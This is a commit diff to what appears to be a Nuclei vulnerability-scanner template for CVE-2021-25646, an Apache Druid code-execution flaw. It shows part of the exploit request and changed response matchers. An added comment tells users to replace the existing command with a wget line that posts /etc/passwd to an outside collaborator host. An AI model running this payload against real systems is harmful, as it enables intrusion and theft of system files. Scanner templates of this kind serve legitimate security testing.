Update CVE-2021-25646.yaml
parent
85db9df19d
commit
b33a15f3e2
|
@ -29,6 +29,9 @@ requests:
|
|||
}
|
||||
},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}
|
||||
|
||||
# To read system Files, replace (wget example.com) with below payload
|
||||
# wget --post-file /etc/passwd http://xxxxxxx.burpcollaborator.net
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
@ -42,6 +45,6 @@ requests:
|
|||
- type: regex
|
||||
regex:
|
||||
- "numRowsRead"
|
||||
- "https://druid.apache.org"
|
||||
- "numRowsIndexed"
|
||||
part: body
|
||||
condtion: and
|
||||
|
|
Loading…
Reference in New Issue